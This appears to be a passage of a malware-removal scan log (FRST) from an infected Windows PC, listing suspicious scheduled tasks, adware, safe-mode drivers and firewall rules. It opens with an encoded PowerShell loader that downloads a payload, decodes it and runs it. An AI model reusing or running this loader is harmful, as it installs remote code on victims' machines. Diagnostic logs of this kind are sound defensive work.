ADkAMgBFAEoAZwAyAHcAWABGADYATABOAGgAMQBKAGsATwA2AEkAWABtAGMAOQBSADAANwBKAGkAZwAzAHAAdABVAFYAMQBEAEUAMgA4AEIANQBwADYAVgBDAE8ATQB4ADUASQBiAFEAbwB6AHUAaABBAEYARwBIAE4AQQB5AEYAXwBZAFkAeABGAE4ASgBzAFYAYgBpAE8AagBLADkANwBRAEMAcgBmAFoASgB1AHEAbgBRAEgAcQBUAEgAcABMAGkASQBEAHkARgBtADEAXwBGAHAAcABWAHoAWgBWAGMAQQB1AGQAaQBEAEUAQwBPAHAAcwBvAEgAWgBhAEYAeAB5AFcAeAAwAGoAaQBMAEgAOABoAGsAYwB5AGcAVQBfAHAAawBYAFoAVQBzAE0AagBzAFYAZABTAHYALQBsAGEAVABWAGUAcQB3AGIANABGAGEAYQB4AGYATgAxAEQAXwBsAGIASgAzADEAYwBOAFUAUABjADIATgBaAEUAZwBvAE8AVgBGAGEANAAzADYAegBiAE8AVgBFAHoAZgBfAHQASABHAGgAaQBqAEkARQBCADAATwB5AG8AWQBjAEoAVgA5AEUAZgBtAGcAawA5AFgAOQBaAGMASAA4AEYAMABBAG8AWQBTAFYAaQA0AEkAdQBnAFcAMAB3AFIAWABjAHMAaQBmAHMAWABjAFUAdwBuAHoAdQB4AHcAWQBNAHoAbwBWAG8AegAtAHYASAB5AFIAdwBvAHMAQgBVAHQAQQBjAFUAVgAtAEYATwA2AHQAagBlAFoAdgA2ADUAeQBWAEgAZwByAG0ANQBBAEsAVwBrAG8ASwB1AG8AZAB5AE4AawBVAE8ATwBpAHMAaQBQAHYAbgBuAGQAYgBiAGoAZgBNAGIAawBHAFgAcwB2AHMAawBfAGcAVABGAEgAMABtAGcARwA2AEMAcABNADEAUwBVAHYAUgA3ADQAQgAwAEgAZQBoAHgAZABkAHoAUQBDAGcAQwBXAG0AUwBnAG8AbQBfADAAOABFADEAVgAzAHQAZgBKAFQAaAAyADkALQBSAGkAbgB5AHcAcgBpAHYAUABHAGoAcwBDAHIAWQBqAEgASwBJADMAagBFAEkAeQB1ADUAaABoAEcAUwB2AFoASABwAFoAQwBpAHEARwBsAHMAegBFAHQATwBEAEYAMwBOADMAZQBPADMATgBkAHkAdwA4AFAAawByAHoAaQAzADQAZwB1AE4AbQB5AHEASABTAFYAagBKADcATwBaAFQAeAAwAEEAVgBxAHoAbABfAHIAMwBDAEkAUgBiAFQAUQBNAEUANwBOADcAZQA3AHEAZABpAHoARwA2AG0ARgBCADIAMwBqAGEAVQBFAF8ARABpADIANQBNAHQAbgBEAGsAegBYAEwANQAxAHAATQBkAFcAUgBJADcAQwBmAHUAdwBsAHUAeQBNADYAVwBDAFgAegBBAHQAeQBXAGsAdwBtAGgANgBoAEsARgBYAG8AQwAxAFoANgByADUAMwBsAGwAVwBtAE8ARwBGAG8AbwBLAG8AaABDAE8AaABKAEIAaABUAHQATQBRAC0AdQAwAFUAagA4AEMAcABCAEQAUgA3ADAAcQBDADEASgBYAGEARABrADQASABuACYAcgA9ADcAOQAyADUANwA4ADUAMwA3ADQAMQAxADAAMQA2ADYAMgAwADIAIgA7ACQAcwB0AHMAawA9ACIAewAzAEMAMwBDAEMARgAyADMALQBEADIAQQA2AC0AMQA1ADUAMAAtADYAMwAwADIALQBGADkAQwAzADkAQgBDADUAQQA5ADcANQB9ACIAOwAkAHAAcgBpAGQAPQAiAEQAVAAiADsAJABpAG4AaQBkAD0AIgAwACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA
Task: {37792BD1-5684-4410-B0BF-5B96C495EEFC} - \AmiUpdXp -> No File <==== ATTENTION
Task: {37D64102-43DC-4669-9D5F-C440AEB03087} - \22a55d69-9f00-4e39-9983-8a08b1069524-11 -> No File <==== ATTENTION
Task: {38F1EC87-431A-499C-A34D-8B09A2FC0DEA} - \ConsumerInputUpdateTaskMachineUA -> No File <==== ATTENTION
Task: {3B372DA0-1811-4CD3-9E1D-D3D2D4EC3173} - \223cecce-1b0c-40e4-94c0-10568c9d47b2-11 -> No File <==== ATTENTION
Task: {3C43E890-7B99-4AD9-9AF3-37569885100E} - \BlockAndSurf_wd -> No File <==== ATTENTION
Task: {3EFFE333-49F0-4306-B0A4-80D42EE62B66} - \Web Protector Plus -> No File <==== ATTENTION
Task: {40AB5D2F-AF98-458F-9470-4316D56135B6} - \BlockAndSurf Update -> No File <==== ATTENTION
Task: {42ACA34C-C760-4936-8119-668BB10B8B0E} - \223cecce-1b0c-40e4-94c0-10568c9d47b2-1 -> No File <==== ATTENTION
Task: {42C3BC7F-B50D-437C-83C9-B6565D8B745F} - \223cecce-1b0c-40e4-94c0-10568c9d47b2-5_user -> No File <==== ATTENTION
Task: {42CD00F7-4928-4363-98D3-0824CA05303D} - \22a55d69-9f00-4e39-9983-8a08b1069524-5 -> No File <==== ATTENTION
Task: {4466149E-D043-464C-B732-93424DF9FC68} - \ShopperPro -> No File <==== ATTENTION
Task: {461C2034-2B07-43E8-83E4-31D7F5CD20C5} - System32\Tasks\Microsoft\Windows\Multimedia\SMupdate3 => Rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll ,Command701 update3 <==== ATTENTION
Task: {4AF98EF8-6984-4E90-BB7F-01FE7746F0D7} - \b0220ba6-09e4-46a8-8a55-a353b242b387-1-6 -> No File <==== ATTENTION
Task: {4B844AAB-C755-40E4-9068-7879730FDC6B} - \SPBIW_UpdateTask_Time_333630343534353131342d235b783432415b45345a2d6c -> No File <==== ATTENTION
Task: {4BE81A3B-C5B7-45B8-B831-22723BEA8F81} - \a250569a-98c2-4048-95cc-84eb2edcd0f9-5_user -> No File <==== ATTENTION
Task: {4DB861DF-AAAB-4E4F-AC9A-1F92599AD489} - System32\Tasks\web_disco_notification_service => C:\Program Files (x86)\web disco\web_disco_notification_service.exe <==== ATTENTION
Task: {58570255-9E70-4643-998F-F9055538D54C} - \globalUpdateUpdateTaskMachineCore -> No File <==== ATTENTION
Task: {59637119-1492-4349-BE78-8631BEE643C8} - \SMupdate1 -> No File <==== ATTENTION
Task: {5A40E926-9E86-4B89-9CFD-B12311724371} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {5DA016D9-C794-4139-BF27-5ACAD8CDBB2E} - \b0220ba6-09e4-46a8-8a55-a353b242b387-5 -> No File <==== ATTENTION
Task: {62FDB5B3-BF42-432F-BE5C-356D2481019A} - \APSnotifierPP2 -> No File <==== ATTENTION
Task: {63472255-BB01-4824-A8D9-B9C82D1C6A02} - \cd8b5ea5-4405-44da-98c0-6646dc55b0e1-10_user -> No File <==== ATTENTION
Task: {6517AD94-3943-4B6C-993C-EACA97408A23} - \Smp -> No File <==== ATTENTION
Task: {65C4EF77-BB66-4D8E-9C39-2F4489171801} - \Crossbrowse -> No File <==== ATTENTION
Task: {712E5CBF-BCAC-48B5-93EC-17629C62F300} - \3315ae47-db79-4ea6-b347-a4b2fa3cb91c-5_user -> No File <==== ATTENTION
Task: {781C8DC9-CB04-4B90-9CE2-6291058A0589} - \globalUpdateUpdateTaskMachineUA -> No File <==== ATTENTION
Task: {798B4FF4-BC44-4454-911C-7304F1140372} - \b0220ba6-09e4-46a8-8a55-a353b242b387-1-7 -> No File <==== ATTENTION
Task: {7CBB73C0-D878-4BD1-9424-77D2B5C9AD57} - \SMWUpd -> No File <==== ATTENTION
Task: {7E01AD6B-5B26-471E-A0A8-CDF27242E872} - \SPDriver -> No File <==== ATTENTION
Task: {7E430EB2-F0D4-45B6-912A-3C11D787E54F} - System32\Tasks\Microsoft\Windows\Maintenance\SMupdate2 => Rundll32.exe C:\PROGRA~1\COMMON~1\System\SysMenu.dll ,Command701 update2 <==== ATTENTION
Task: {7E5C382B-DB86-431E-AEAB-8CF69D7ED911} - \Plus-HD-1.2-firefoxinstaller -> No File <==== ATTENTION
Task: {80269159-B28E-4F13-9F6D-57EE3349B0A4} - \APSnotifierPP1 -> No File <==== ATTENTION
Task: {8135D8E0-C759-4618-93E2-CEB3FE1A49CB} - \mr_fun_notification_service -> No File <==== ATTENTION
Task: {81BAFA66-DB16-49F7-8263-631E6BE42114} - \3315ae47-db79-4ea6-b347-a4b2fa3cb91c-5 -> No File <==== ATTENTION
Task: {8757F209-3D97-41C9-9C78-567B10E23B83} - \SMW_UpdateTask_Time_333630343534353131342d235b783432415b45345a2d6c -> No File <==== ATTENTION
Task: {8C89D02C-C8D4-405C-9D65-CEDDB5C243EC} - \cd8b5ea5-4405-44da-98c0-6646dc55b0e1-5_user -> No File <==== ATTENTION
Task: {91321DF8-AAB5-452E-A945-7E35B11F2E89} - System32\Tasks\HPCustParticipation HP Deskjet 3510 series => C:\Program Files\HP\HP Deskjet 3510 series\Bin\HPCustPartic.exe [2012-05-08] (Hewlett-Packard Co.)
Task: {9361744C-A1E3-465B-BA1A-1F2D434BE3EF} - \b917f354-73c6-437f-845a-847de7226630-5 -> No File <==== ATTENTION
Task: {9470C9FA-D56F-41E0-8C31-E8FA3DCB4FC0} - System32\Tasks\Astromenda => C:\Users\NEXUSM~1\AppData\Roaming\ASTROM~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
Task: {953B56D7-95E9-45BE-9459-A7C8CEB53C11} - \CIMT_S-1-5-21-2978377406-116969058-805938779-1000 -> No File <==== ATTENTION
Task: {96A1650B-6E48-4613-AEFE-34294AF2B26D} - System32\Tasks\SFUKRJBE => C:\ProgramData\25843018f2844fe49c67328b993d18ab\25843018f2844fe49c67328b993d18ab.exe <==== ATTENTION
Task: {9DDBE0F0-05A4-44E6-ABD1-AAE13541F3EC} - System32\Tasks\YTDownloaderUpd => C:\Program Files (x86)\YTDownloader\updater.exe [2015-01-08] (Goobzo) <==== ATTENTION
Task: {A191E52B-C012-403D-8103-0443BF5CA178} - \9a453951-0637-4363-87cf-6eacfdd0bf82-1-6 -> No File <==== ATTENTION
Task: {A2B20CBD-F1CF-4A70-BE21-1DFC5703D5D0} - System32\Tasks\GoogleUpdateTaskUserM_1_7_22_478699874-4155726479-3780505679-3006UA__333630343534353131342d235b783432415b45345a2d6c => C:\Windows\system32\wscript.exe [2009-07-13] (Microsoft Corporation)
Task: {AD06492B-964B-4C66-BB1F-83DC7EBBBD31} - \b917f354-73c6-437f-845a-847de7226630-5_user -> No File <==== ATTENTION
Task: {B5E519B9-EBB0-4D9D-A013-FFA9971E8283} - \cd8b5ea5-4405-44da-98c0-6646dc55b0e1-5 -> No File <==== ATTENTION
Task: {B601E839-C06C-4AB2-BBD3-42DA433CAAFF} - \ConsumerInputUpdateTaskMachineCore -> No File <==== ATTENTION
Task: {B6A7C774-ED5B-432D-8D0A-B3063C4B8373} - \9a453951-0637-4363-87cf-6eacfdd0bf82-10_user -> No File <==== ATTENTION
Task: {B7BE2A1B-D6B7-4E7D-94CB-825E8CBDE708} - \ShopperProJSUpd -> No File <==== ATTENTION
Task: {BF1CCE45-F0D7-45C6-88F2-F44389676F8B} - System32\Tasks\4836 => C:\Windows\system32\wscript.exe [2009-07-13] (Microsoft Corporation) <==== ATTENTION
Task: {C077B919-EDA9-4457-BB55-931550D31E88} - \a250569a-98c2-4048-95cc-84eb2edcd0f9-10_user -> No File <==== ATTENTION
Task: {C6B6EC14-6034-4359-80BD-3CE1FE235DBB} - \gtaUpt -> No File <==== ATTENTION
Task: {C7D4E715-84A9-4292-AFAC-2622CD5C7399} - \a250569a-98c2-4048-95cc-84eb2edcd0f9-5 -> No File <==== ATTENTION
Task: {CA6705BB-2A84-4DE6-9B04-1D0292DB6CD2} - \b917f354-73c6-437f-845a-847de7226630-11 -> No File <==== ATTENTION
Task: {CAE32489-38E8-4B9F-88EC-3E0547DEAA28} - \9a453951-0637-4363-87cf-6eacfdd0bf82-1-7 -> No File <==== ATTENTION
Task: {CBA4CD96-C146-47E0-9698-CA27256BA2F7} - \22a55d69-9f00-4e39-9983-8a08b1069524-3 -> No File <==== ATTENTION
Task: {CD272327-D23F-4471-A849-7FE0FF01090D} - \CIMT_daily_S-1-5-21-2978377406-116969058-805938779-1000 -> No File <==== ATTENTION
Task: {CFB6165A-8D8A-4C3F-9E17-2F4E3B5D2EBE} - \SmartWeb Upgrade Trigger Task -> No File <==== ATTENTION
Task: {D24800E9-D72F-4170-B523-E7C2AA29AF6A} - \22a55d69-9f00-4e39-9983-8a08b1069524-4 -> No File <==== ATTENTION
Task: {D6FF6C58-6292-4C05-8B0D-57EC59C74B48} - \b0220ba6-09e4-46a8-8a55-a353b242b387-10_user -> No File <==== ATTENTION
Task: {D833AA11-E23E-4B42-A1D9-9DB2EC492194} - System32\Tasks\YTDownloader => C:\Program Files (x86)\YTDownloader\YTDownloader.exe [2015-04-22] (YTDownloader) <==== ATTENTION
Task: {DD9F510C-95F4-499A-90C8-BAC5BC372FF4} - System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask => start sppsvc
Task: {DF32B448-D147-4112-BD7A-42CE73002440} - \b0220ba6-09e4-46a8-8a55-a353b242b387-5_user -> No File <==== ATTENTION
Task: {E0604DBE-BA0E-4E4B-89E1-D187C4AC4E00} - \Web Protector Plus Server -> No File <==== ATTENTION
Task: {E14EB690-DAB0-4B1E-9DAB-E847276BB426} - \9a453951-0637-4363-87cf-6eacfdd0bf82-4 -> No File <==== ATTENTION
Task: {E16003EC-4060-4D1A-854D-9D83E7FD6A9F} - \Plus-HD-1.2-chromeinstaller -> No File <==== ATTENTION
Task: {E79DDE3A-283A-4EB8-A8DB-25A3F1E10FBC} - System32\Tasks\0 => Iexplore.exe  <==== ATTENTION
Task: {E875ED51-1937-4C3B-AC7B-955A7F2597E6} - \9a453951-0637-4363-87cf-6eacfdd0bf82-5 -> No File <==== ATTENTION
Task: {E9567459-8EA7-45F8-AA7E-37D353BC0D26} - System32\Tasks\e6a4b65b-e1dc-4d98-84ce-5654a35812c9 => C:\Program Files (x86)\video MediaPlay-Air\223cecce-1b0c-40e4-94c0-10568c9d47b2-4.exe <==== ATTENTION
Task: {EA444C25-CCA5-4E11-B3FB-525A4D9815AB} - \3315ae47-db79-4ea6-b347-a4b2fa3cb91c-10_user -> No File <==== ATTENTION
Task: {EA87C758-CD62-4E6D-B90F-C263383B761C} - System32\Tasks\Nnafrihab => C:\ProgramData\Nnafrihab\1.0.7.1\awuelesk.exe
Task: {EAA7CAC6-0B86-4AEA-9609-81B789D98898} - System32\Tasks\LaunchApp => C:\Program Files (x86)\MyPC Backup\MyPC Backup.exe <==== ATTENTION
Task: {EC6FCC38-4691-4971-AD83-9406D152762E} - \cd8b5ea5-4405-44da-98c0-6646dc55b0e1-1-7 -> No File <==== ATTENTION
Task: {ED5CE69B-9BEF-4534-B5F8-CD520A9271C6} - \223cecce-1b0c-40e4-94c0-10568c9d47b2-5 -> No File <==== ATTENTION
Task: {F078B885-FC60-448B-ACE0-DB8A472369CD} - \cd8b5ea5-4405-44da-98c0-6646dc55b0e1-4 -> No File <==== ATTENTION
Task: {F53EBC0B-5EDE-4C12-8DAC-BA41281AB0F0} - \22a55d69-9f00-4e39-9983-8a08b1069524-5_user -> No File <==== ATTENTION
Task: {FA70133E-BDAB-4027-9671-68531A9920DA} - \9a453951-0637-4363-87cf-6eacfdd0bf82-5_user -> No File <==== ATTENTION
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\cCDRV5n4y.job => C:\Users\Nexus Media Server\AppData\Roaming\cCDRV5n4y.exe <==== ATTENTION
Task: C:\Windows\Tasks\DriverToolkit Autorun.job => C:\Program Files (x86)\DriverToolkit\DriverToolkit.exe
Task: C:\Windows\Tasks\e6a4b65b-e1dc-4d98-84ce-5654a35812c9.job => C:\Program Files (x86)\video MediaPlay-Air\223cecce-1b0c-40e4-94c0-10568c9d47b2-4.exe <==== ATTENTION
Task: C:\Windows\Tasks\FQfcQIFiv3.job => C:\Users\Nexus Media Server\AppData\Roaming\FQfcQIFiv3.exe <==== ATTENTION
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d14db2270fc555.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\web_disco_notification_service.job => C:\Program Files (x86)\web disco\web_disco_notification_service.exeǥ/url='hxxp:/cdn.selectbestopt.com/notf_sys/index.html' /crregname='web disco' /appid='73143' /srcid='2913' /bic='c2622811f82ea9bcabadfd7993fe0e7c' /verifier='f674d3cc28017886611145c5672056c8' /installerversion='1.50.3.10' /statsdomain='hxxp:/stats.buildomserv.com/data.gif?' /errorsdomain='hxxp:/stats.buildomserv.com/data.gif?' /monetizationdomain='hxxp:/logs.buildomserv.com/monetization.gif <==== ATTENTION
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-04-22 04:57 - 2015-04-22 04:57 - 00112560 _____ () C:\Program Files (x86)\YTDownloader\BrowserHelperSrv.exe
2014-12-25 06:49 - 2014-12-25 06:49 - 00121344 _____ () C:\Program Files (x86)\PepperZip\shell\PPZShellExtension_x64.dll
2011-07-18 00:56 - 2009-08-16 16:06 - 00166400 _____ () C:\Program Files\WinRAR\rarext.dll
2015-07-27 08:32 - 2013-06-26 15:16 - 07342080 _____ () C:\Program Files (x86)\Itibiti Soft Phone\Itibiti.exe
2010-02-03 08:36 - 2010-02-03 08:36 - 00087488 _____ () C:\Program Files (x86)\SlySoft\AnyDVD\ADvdDiscHlp64.exe
2010-01-01 00:02 - 2010-01-01 00:02 - 00011264 _____ () C:\Users\Nexus Media Server\AppData\Local\Temp\nsf9A9B.tmp\System.dll
2010-01-01 00:02 - 2010-01-01 00:02 - 00091136 _____ () C:\Users\Nexus Media Server\AppData\Local\Temp\nsf9A9B.tmp\base64.dll
2010-01-01 00:02 - 2010-01-01 00:02 - 00004096 _____ () C:\Users\Nexus Media Server\AppData\Local\Temp\nsf9A9B.tmp\ThreadTimer.dll
2010-01-01 00:02 - 2010-01-01 00:02 - 00020992 _____ () C:\Users\Nexus Media Server\AppData\Local\Temp\nsf9A9B.tmp\inetc.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\TEMP:373E1720
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Sobhi119.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Unepfy119.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Gambali => ""="service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist Remote Support Customer => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Sobhi119.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Unepfy119.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Zeocpogma => ""="service"
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-2978377406-116969058-805938779-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Nexus Media Server\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 0) (EnableLUA: 1)
Windows Firewall is disabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [VirtualPC-In-UDP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-UDP-2] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-TCP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [TCP Query User{36D41A54-87E5-4F23-849B-B11CDCB365A8}C:\program files (x86)\boxee\boxee.exe] => (Allow) C:\program files (x86)\boxee\boxee.exe
FirewallRules: [UDP Query User{354AFFAC-D6B9-4DDC-983E-4D15BE7A5796}C:\program files (x86)\boxee\boxee.exe] => (Allow) C:\program files (x86)\boxee\boxee.exe
FirewallRules: [TCP Query User{B35102B9-9235-4840-8037-C9C5AE6B02CC}C:\program files (x86)\boxee\boxee.exe] => (Allow) C:\program files (x86)\boxee\boxee.exe
FirewallRules: [UDP Query User{119E9029-03D0-4CDB-B505-9E5BF0CD50D2}C:\program files (x86)\boxee\boxee.exe] => (Allow) C:\program files (x86)\boxee\boxee.exe
FirewallRules: [TCP Query User{9F359E04-2860-4D2A-80A5-F01DD7819D2B}C:\program files (x86)\antoneboxee\boxee\boxee.exe] => (Allow) C:\program files (x86)\antoneboxee\boxee\boxee.exe
FirewallRules: [UDP Query User{F83D7C22-35A2-4BA2-89A8-F8A02CE1322C}C:\program files (x86)\antoneboxee\boxee\boxee.exe] => (Allow) C:\program files (x86)\antoneboxee\boxee\boxee.exe
FirewallRules: [TCP Query User{0B60EC17-517A-42B9-9886-B4D7F6834476}C:\users\nexus media server\documents\box\boxee\boxee.exe] => (Allow) C:\users\nexus media server\documents\box\boxee\boxee.exe
FirewallRules: [UDP Query User{DC1196D8-CA26-4B5B-87D3-B1B9307E9CC1}C:\users\nexus media server\documents\box\boxee\boxee.exe] => (Allow) C:\users\nexus media server\documents\box\boxee\boxee.exe
FirewallRules: [TCP Query User{E67547D4-3CEC-40C3-A4CA-0D6D37D84EDB}C:\program files\vuze\azureus.exe] => (Block) C:\program files\vuze\azureus.exe
FirewallRules: [UDP Query User{C4B21A79-AF05-4E4F-BFB7-352351B6C154}C:\program files\vuze\azureus.exe] => (Block) C:\program files\vuze\azureus.exe
FirewallRules: [{DCABF32F-6539-4DA1-ACBF-9E4D8B3F73B0}] => (Allow) C:\Program Files\HP\HP Deskjet 3510 series\Bin\DeviceSetup.exe
FirewallRules: [{F4191A71-C683-40C3-B035-AA55BCFA5222}] => (Allow) C:\Program Files\HP\HP Deskjet 3510 series\Bin\HPNetworkCommunicator.exe
FirewallRules: [{CB76890A-F1FB-4872-A87A-9F2628235482}] => (Allow) C:\Program Files\HP\HP Deskjet 3510 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [{454482FD-465B-4C38-B44F-7EC756DCAAD1}] => (Allow) C:\Program Files\Vuze\Azureus.exe
FirewallRules: [{2FAB9C4F-BBE6-4630-AE5D-98D74A01EE21}] => (Allow) C:\Program Files\Vuze\Azureus.exe
FirewallRules: [{4A28A9DA-F8E4-4226-9E27-0DC821AC6DBF}] => (Allow) C:\Program Files (x86)\Windows Audio\R1\AudioSrv.exe
FirewallRules: [{DCD0BCB8-A92D-44FC-893C-09F222B1BF21}] => (Allow) C:\Program Files (x86)\Windows Audio\R1\Netclean.exe
FirewallRules: [{619B9811-4067-43A7-B0C7-BA66E407F7B4}] => (Allow) C:\Program Files (x86)\speed browser\Application\browser.exe
FirewallRules: [{2998B96B-604D-416F-9777-137293F5793D}] => (Allow) C:\ProgramData\AzekMui\vejaoly.EXE
FirewallRules: [{D7232CCA-3CDF-4A35-B9B3-A8BD3E061176}] => (Allow) C:\ProgramData\AzekMui\vejaoly.EXE
FirewallRules: [{B94EBE04-0623-4325-A548-F7DF8F93DE95}] => (Allow) C:\ProgramData\AzekMui\vejaoly.EXE
